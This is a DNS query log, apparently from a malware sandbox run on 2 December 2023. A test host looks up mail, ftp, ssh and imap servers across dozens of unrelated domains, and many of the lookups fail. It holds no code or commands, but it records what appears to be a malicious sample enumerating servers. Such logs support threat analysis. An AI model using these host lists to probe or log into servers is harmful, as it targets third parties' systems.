                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.176762104 CET1.1.1.1192.168.2.60x8e82No error (0)mx.frametalent.it62.149.128.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.176762104 CET1.1.1.1192.168.2.60x8e82No error (0)mx.frametalent.it62.149.128.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.176762104 CET1.1.1.1192.168.2.60x8e82No error (0)mx.frametalent.it62.149.128.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.176762104 CET1.1.1.1192.168.2.60x8e82No error (0)mx.frametalent.it62.149.128.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.176762104 CET1.1.1.1192.168.2.60x8e82No error (0)mx.frametalent.it62.149.128.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.176762104 CET1.1.1.1192.168.2.60x8e82No error (0)mx.frametalent.it62.149.128.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.176762104 CET1.1.1.1192.168.2.60x8e82No error (0)mx.frametalent.it62.149.128.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.176762104 CET1.1.1.1192.168.2.60x8e82No error (0)mx.frametalent.it62.149.128.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.183538914 CET1.1.1.1192.168.2.60xd64No error (0)mail.azarkavin.com193.141.65.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.183552027 CET1.1.1.1192.168.2.60xd64No error (0)mail.azarkavin.com193.141.65.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.204063892 CET1.1.1.1192.168.2.60xec78Name error (3)mail.goexlife.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.559478045 CET1.1.1.1192.168.2.60xa7d4No error (0)hoster.by178.172.160.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.746411085 CET1.1.1.1192.168.2.60x481dNo error (0)www.finaleasing.it89.46.109.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.749747038 CET1.1.1.1192.168.2.60xfa55Name error (3)ftp.llefigaro.frnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.760795116 CET1.1.1.1192.168.2.60xf0e4Name error (3)ftp.my-bingo-games.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.799781084 CET1.1.1.1192.168.2.60xf46bNo error (0)www.slovtain.sk85.248.130.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.932519913 CET1.1.1.1192.168.2.60xf46bNo error (0)www.slovtain.sk85.248.130.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.937779903 CET1.1.1.1192.168.2.60xbf81No error (0)www.entodo.netlb.yelo.redCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.937779903 CET1.1.1.1192.168.2.60xbf81No error (0)lb.yelo.red54.203.56.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.945343971 CET1.1.1.1192.168.2.60xbf81No error (0)www.entodo.netlb.yelo.redCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.945343971 CET1.1.1.1192.168.2.60xbf81No error (0)lb.yelo.red54.203.56.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.946083069 CET1.1.1.1192.168.2.60xcddcName error (3)ssh.winstonlf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.084877968 CET1.1.1.1192.168.2.60x7d7cNo error (0)www.dune-architecture.be213.186.33.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.157509089 CET1.1.1.1192.168.2.60x4553No error (0)mail.manizan.com116.203.110.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.157582045 CET1.1.1.1192.168.2.60x4553No error (0)mail.manizan.com116.203.110.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.314426899 CET1.1.1.1192.168.2.60xce1bName error (3)imap.goexlife.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.359988928 CET1.1.1.1192.168.2.60xda75Name error (3)ftp.mail.tomsknetrunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.485567093 CET1.1.1.1192.168.2.60x1795Name error (3)ssh.joslindisplaysinc.cononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.494426966 CET1.1.1.1192.168.2.60xa8aaName error (3)elyashevich.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.494721889 CET1.1.1.1192.168.2.60x2ba0Name error (3)winstonlf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.532376051 CET1.1.1.1192.168.2.60xccc8No error (0)www.attineos-cyber.com137.74.230.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.548746109 CET1.1.1.1192.168.2.60xd9ceName error (3)bdoxwz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.550652981 CET1.1.1.1192.168.2.60x6b35Name error (3)egmaik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.554732084 CET1.1.1.1192.168.2.60xae1cName error (3)topbingo-games.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.556432009 CET1.1.1.1192.168.2.60x54a4Name error (3)ftp.bdoxwz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.557939053 CET1.1.1.1192.168.2.60x22d8Name error (3)ftp.cznkqhnq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.584584951 CET1.1.1.1192.168.2.60xd209Name error (3)ftp.topbingo-games.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.592087984 CET1.1.1.1192.168.2.60x70a3Name error (3)my-bingo-games.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.599628925 CET1.1.1.1192.168.2.60x576cName error (3)erofeev.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.599857092 CET1.1.1.1192.168.2.60x2627No error (0)www.frametalent.it89.46.108.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.599863052 CET1.1.1.1192.168.2.60x2627No error (0)www.frametalent.it89.46.108.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.601598978 CET1.1.1.1192.168.2.60xfc14Name error (3)ftp.bingo.cozanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.602005005 CET1.1.1.1192.168.2.60x6421Name error (3)kidj.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.605906963 CET1.1.1.1192.168.2.60xd49Name error (3)ftp.erofeev.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.613359928 CET1.1.1.1192.168.2.60x7e8dName error (3)ftp.euromarin.esnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.614346981 CET1.1.1.1192.168.2.60x4c14Name error (3)mail.tomsknetrunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.628201008 CET1.1.1.1192.168.2.60x93a6Name error (3)noxnoir.dknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.645431042 CET1.1.1.1192.168.2.60xe780Name error (3)elseti.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.671694040 CET1.1.1.1192.168.2.60xccc8No error (0)www.attineos-cyber.com137.74.230.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.788184881 CET1.1.1.1192.168.2.60xe11Name error (3)aopcgaming.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.846769094 CET1.1.1.1192.168.2.60x116bName error (3)euromarin.esnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.072845936 CET1.1.1.1192.168.2.60x6b35Name error (3)egmaik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.073024988 CET1.1.1.1192.168.2.60xd9ceName error (3)bdoxwz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.074273109 CET1.1.1.1192.168.2.60xae1cName error (3)topbingo-games.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.133532047 CET1.1.1.1192.168.2.60x1ab6Name error (3)ftp.elseti.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.134351969 CET1.1.1.1192.168.2.60xa3e4Name error (3)ftp.kidj.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.159184933 CET1.1.1.1192.168.2.60xe2b7No error (0)www.datasense.frdatasense.frCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.159184933 CET1.1.1.1192.168.2.60xe2b7No error (0)datasense.fr144.217.97.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.159193993 CET1.1.1.1192.168.2.60xe2b7No error (0)www.datasense.frdatasense.frCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.159193993 CET1.1.1.1192.168.2.60xe2b7No error (0)datasense.fr144.217.97.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.350918055 CET1.1.1.1192.168.2.60xed4eName error (3)ftp.egmaik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.416665077 CET1.1.1.1192.168.2.60xa821Name error (3)ftp.winstonlf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.417084932 CET1.1.1.1192.168.2.60x875fName error (3)mail.elyashevich.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.445837975 CET1.1.1.1192.168.2.60x7687Name error (3)ftp.elyashevich.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.541146994 CET1.1.1.1192.168.2.60x4031Name error (3)mail.winstonlf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.820650101 CET1.1.1.1192.168.2.60xd388Name error (3)er.styggnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.821827888 CET1.1.1.1192.168.2.60x534Name error (3)joslindisplaysinc.cononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.821835995 CET1.1.1.1192.168.2.60x927fName error (3)ftp.er.styggnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.821841955 CET1.1.1.1192.168.2.60xe952Name error (3)devbreeze.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.823456049 CET1.1.1.1192.168.2.60x155Name error (3)mlk546gabr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.823822021 CET1.1.1.1192.168.2.60x3dc5Name error (3)mail.devbreeze.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.824851036 CET1.1.1.1192.168.2.60xdfa7Name error (3)brevesdunsoir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.824858904 CET1.1.1.1192.168.2.60x4e1eName error (3)mail.bingo.cozanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.826179028 CET1.1.1.1192.168.2.60x3cb7Name error (3)mail.rabco.benonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.827397108 CET1.1.1.1192.168.2.60x41a7Name error (3)ftp.brevesdunsoir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.843883038 CET1.1.1.1192.168.2.60x8ca4Name error (3)ftp.exmur.nia.nih.govnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.940993071 CET1.1.1.1192.168.2.60x91fdName error (3)ftp.yahoogabes.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.945579052 CET1.1.1.1192.168.2.60x9f79No error (0)www.pfprojekt.skwan1.pfprojekt.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.945579052 CET1.1.1.1192.168.2.60x9f79No error (0)wan1.pfprojekt.sk195.68.234.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.945585966 CET1.1.1.1192.168.2.60x9f79No error (0)www.pfprojekt.skwan1.pfprojekt.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.945585966 CET1.1.1.1192.168.2.60x9f79No error (0)wan1.pfprojekt.sk195.68.234.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.096860886 CET1.1.1.1192.168.2.60x66ecName error (3)assiri.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.145582914 CET1.1.1.1192.168.2.60x437Name error (3)ftp.condorponteggi.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.231868029 CET1.1.1.1192.168.2.60x437Name error (3)ftp.condorponteggi.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.257004976 CET1.1.1.1192.168.2.60x58fcName error (3)princessmonty.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.262921095 CET1.1.1.1192.168.2.60xa778Name error (3)bingo.cozanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.265058994 CET1.1.1.1192.168.2.60x4688Name error (3)yahoogabes.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.267091990 CET1.1.1.1192.168.2.60x8f9cName error (3)ftp.devbreeze.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.341375113 CET1.1.1.1192.168.2.60x5e16Name error (3)rabco.benonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.361792088 CET1.1.1.1192.168.2.60x583Name error (3)goexlife.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.366928101 CET1.1.1.1192.168.2.60xdef6Name error (3)llefigaro.frnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.368968964 CET1.1.1.1192.168.2.60xf7d9Name error (3)ftp.rabco.benonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.390341997 CET1.1.1.1192.168.2.60x75f2Name error (3)ftp.goexlife.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.405981064 CET1.1.1.1192.168.2.60x480Name error (3)mail.er.styggnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.412847996 CET1.1.1.1192.168.2.60x3f84Name error (3)cznkqhnq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.451523066 CET1.1.1.1192.168.2.60xa201Name error (3)ftp.r2husers.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.451529980 CET1.1.1.1192.168.2.60x963eName error (3)ftp.mlk546gabr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.561278105 CET1.1.1.1192.168.2.60x7182Name error (3)yoymail.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.609687090 CET1.1.1.1192.168.2.60x7182Name error (3)yoymail.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.622853994 CET1.1.1.1192.168.2.60x3715Name error (3)ftp.assiri.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.627190113 CET1.1.1.1192.168.2.60x3c67Name error (3)mail.kidj.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.652812958 CET1.1.1.1192.168.2.60xfc9cName error (3)ftp.yoymail.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.661407948 CET1.1.1.1192.168.2.60xfc9cName error (3)ftp.yoymail.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.682579994 CET1.1.1.1192.168.2.60x57ceName error (3)ftp.aopcgaming.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.730787992 CET1.1.1.1192.168.2.60x3715Name error (3)ftp.assiri.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.768831968 CET1.1.1.1192.168.2.60x2c07Name error (3)mail.elseti.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.793452024 CET1.1.1.1192.168.2.60xc0ddName error (3)mail.aopcgaming.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.809859991 CET1.1.1.1192.168.2.60xa0fbName error (3)mail.mail.tomsknetrunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.810516119 CET1.1.1.1192.168.2.60x3ee7Name error (3)mail.erofeev.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.814407110 CET1.1.1.1192.168.2.60x43a0Name error (3)mail.noxnoir.dknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.835947990 CET1.1.1.1192.168.2.60x5b7Name error (3)ftp.noxnoir.dknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.889930010 CET1.1.1.1192.168.2.60xfbd7Name error (3)condorponteggi.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.142139912 CET1.1.1.1192.168.2.60xc522No error (0)www.manizan.commanizan.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.142139912 CET1.1.1.1192.168.2.60xc522No error (0)manizan.com188.0.240.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.142158985 CET1.1.1.1192.168.2.60xc522No error (0)www.manizan.commanizan.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.142158985 CET1.1.1.1192.168.2.60xc522No error (0)manizan.com188.0.240.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.142294884 CET1.1.1.1192.168.2.60xc522No error (0)www.manizan.commanizan.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.142294884 CET1.1.1.1192.168.2.60xc522No error (0)manizan.com188.0.240.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.307248116 CET1.1.1.1192.168.2.60x1cccName error (3)mail.bdoxwz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.308414936 CET1.1.1.1192.168.2.60x34f9Name error (3)mail.topbingo-games.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.309489012 CET1.1.1.1192.168.2.60x27e7Name error (3)mail.egmaik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.357322931 CET1.1.1.1192.168.2.60x4db1Name error (3)mail.euromarin.esnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.358690023 CET1.1.1.1192.168.2.60x4a01Name error (3)mail.joslindisplaysinc.cononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.548146009 CET1.1.1.1192.168.2.60x2c9fName error (3)mail.brevesdunsoir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.960700035 CET1.1.1.1192.168.2.60x180cName error (3)mail.mlk546gabr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.055938959 CET1.1.1.1192.168.2.60xf368Name error (3)mail.princessmonty.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.057476044 CET1.1.1.1192.168.2.60xc860No error (0)attineos.com137.74.230.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.161006927 CET1.1.1.1192.168.2.60x9deName error (3)mail.cznkqhnq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.237508059 CET1.1.1.1192.168.2.60x150bName error (3)mail.my-bingo-games.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.243485928 CET1.1.1.1192.168.2.60x7628Name error (3)mail.goexlife.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.251756907 CET1.1.1.1192.168.2.60x3cd3Name error (3)mail.assiri.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.622848034 CET1.1.1.1192.168.2.60x4716Name error (3)ssh.erofeev.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.758888006 CET1.1.1.1192.168.2.60xb670Name error (3)ssh.euromarin.esnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.639183044 CET1.1.1.1192.168.2.60x46cfName error (3)elyashevich.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.643284082 CET1.1.1.1192.168.2.60x64ccName error (3)erofeev.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.643291950 CET1.1.1.1192.168.2.60x71fcName error (3)bdoxwz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.645802021 CET1.1.1.1192.168.2.60xe881Name error (3)ssh.bdoxwz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.739681959 CET1.1.1.1192.168.2.60xff39Name error (3)ssh.elyashevich.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.739965916 CET1.1.1.1192.168.2.60xf2faName error (3)egmaik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.743463993 CET1.1.1.1192.168.2.60x63e8Name error (3)ssh.egmaik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.753036022 CET1.1.1.1192.168.2.60x271bName error (3)mail.yoymail.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.756449938 CET1.1.1.1192.168.2.60xef6dName error (3)topbingo-games.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.758126974 CET1.1.1.1192.168.2.60x40aeName error (3)ssh.topbingo-games.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.763325930 CET1.1.1.1192.168.2.60x26f8Name error (3)ssh.kidj.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.764106035 CET1.1.1.1192.168.2.60x562aName error (3)kidj.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.764717102 CET1.1.1.1192.168.2.60x129dName error (3)ssh.winstonlf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.764777899 CET1.1.1.1192.168.2.60x85faName error (3)ftp.kidj.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.764784098 CET1.1.1.1192.168.2.60xc2fcName error (3)ftp.elseti.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.778860092 CET1.1.1.1192.168.2.60x271bName error (3)mail.yoymail.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.790867090 CET1.1.1.1192.168.2.60x3bdcName error (3)aopcgaming.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.815686941 CET1.1.1.1192.168.2.60x1856Name error (3)ftp.erofeev.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.816764116 CET1.1.1.1192.168.2.60xd3cbName error (3)elseti.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.871089935 CET1.1.1.1192.168.2.60xc854Name error (3)noxnoir.dknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:34.023166895 CET1.1.1.1192.168.2.60x725Name error (3)euromarin.esnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:34.070174932 CET1.1.1.1192.168.2.60x13e4Name error (3)mail.condorponteggi.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.090013981 CET1.1.1.1192.168.2.60x2252Name error (3)ssh.joslindisplaysinc.cononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.093431950 CET1.1.1.1192.168.2.60xc7c5Name error (3)mail.elyashevich.comnonenoneA (IP address)IN (0x0001)false
